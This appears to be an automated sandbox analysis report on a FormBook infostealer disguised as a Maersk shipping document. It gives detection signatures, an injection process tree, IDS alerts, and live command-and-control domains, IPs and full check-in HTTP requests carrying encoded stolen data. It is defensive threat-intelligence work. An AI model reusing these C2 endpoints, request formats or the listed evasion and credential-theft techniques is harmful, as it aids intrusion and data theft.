Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MAERSK LINE SHIPPING DOC_4253.exe

Overview

General Information

Sample name:MAERSK LINE SHIPPING DOC_4253.exe
Analysis ID:1572390
MD5:1175234dabbeab0e4a9ee04802ef57fa
SHA1:1b66c849b4ca2f01c7c778e4fbf4d91b8302dc09
SHA256:5ca92658980b5d1f46f53d78202bd40e442163622e2edb5220046f74e5748945
Tags:exeFormbookMaerskuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • MAERSK LINE SHIPPING DOC_4253.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe" MD5: 1175234DABBEAB0E4A9EE04802EF57FA)
    • MAERSK LINE SHIPPING DOC_4253.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe" MD5: 1175234DABBEAB0E4A9EE04802EF57FA)
      • FeNbdhmZHKN.exe (PID: 6316 cmdline: "C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 8144 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • FeNbdhmZHKN.exe (PID: 732 cmdline: "C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T14:22:11.788102+010020507451Malware Command and Control Activity Detected192.168.2.1149868161.97.142.14480TCP
                2024-12-10T14:22:37.852826+010020507451Malware Command and Control Activity Detected192.168.2.1149928107.155.56.3080TCP
                2024-12-10T14:22:53.708458+010020507451Malware Command and Control Activity Detected192.168.2.114996913.228.81.3980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T14:22:11.788102+010028554651A Network Trojan was detected192.168.2.1149868161.97.142.14480TCP
                2024-12-10T14:22:37.852826+010028554651A Network Trojan was detected192.168.2.1149928107.155.56.3080TCP
                2024-12-10T14:22:53.708458+010028554651A Network Trojan was detected192.168.2.114996913.228.81.3980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T14:22:29.605213+010028554641A Network Trojan was detected192.168.2.1149908107.155.56.3080TCP
                2024-12-10T14:22:32.417853+010028554641A Network Trojan was detected192.168.2.1149914107.155.56.3080TCP
                2024-12-10T14:22:35.089801+010028554641A Network Trojan was detected192.168.2.1149921107.155.56.3080TCP
                2024-12-10T14:22:45.652104+010028554641A Network Trojan was detected192.168.2.114994713.228.81.3980TCP
                2024-12-10T14:22:48.324205+010028554641A Network Trojan was detected192.168.2.114995413.228.81.3980TCP
                2024-12-10T14:22:50.980272+010028554641A Network Trojan was detected192.168.2.114996113.228.81.3980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmPAvira URL Cloud: Label: malware
                Source: https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUAvira URL Cloud: Label: malware
                Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: MAERSK LINE SHIPPING DOC_4253.exeReversingLabs: Detection: 26%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: MAERSK LINE SHIPPING DOC_4253.exeJoe Sandbox ML: detected
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FeNbdhmZHKN.exe, 00000005.00000002.2536087512.000000000002E000.00000002.00000001.01000000.0000000D.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962093607.000000000002E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MAERSK LINE SHIPPING DOC_4253.exe, MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aqoo.pdbSHA256 source: MAERSK LINE SHIPPING DOC_4253.exe
                Source: Binary string: tzutil.pdb source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: aqoo.pdb source: MAERSK LINE SHIPPING DOC_4253.exe
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0097C9D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0097C9D0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax6_2_00969F80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h6_2_033004D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49868 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49868 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49908 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49921 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49928 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49928 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49914 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49947 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49961 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49954 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49969 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49969 -> 13.228.81.39:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.070001325.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 13.228.81.39 13.228.81.39
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2gcl/?jHm4GXr=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&2z=xX0xzrrpPjmP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 6a 48 6d 34 47 58 72 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 30 79 5a 51 32 6d 6f 59 64 42 36 4a 46 6c 74 36 53 58 77 77 54 30 6a 71 78 63 63 32 4a 74 6e 51 3d 3d Data Ascii: jHm4GXr=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC0yZQ2moYdB6JFlt6SXwwT0jqxcc2JtnQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 13:22:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1336551856.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: FeNbdhmZHKN.exe, 00000009.00000002.2537167858.00000000013C2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click
                Source: FeNbdhmZHKN.exe, 00000009.00000002.2537167858.00000000013C2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click/y49d/
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000006.00000003.2082166495.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033seLMEM
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033XE
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                Source: tzutil.exe, 00000006.00000002.2538835830.0000000004138000.00000004.10000000.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
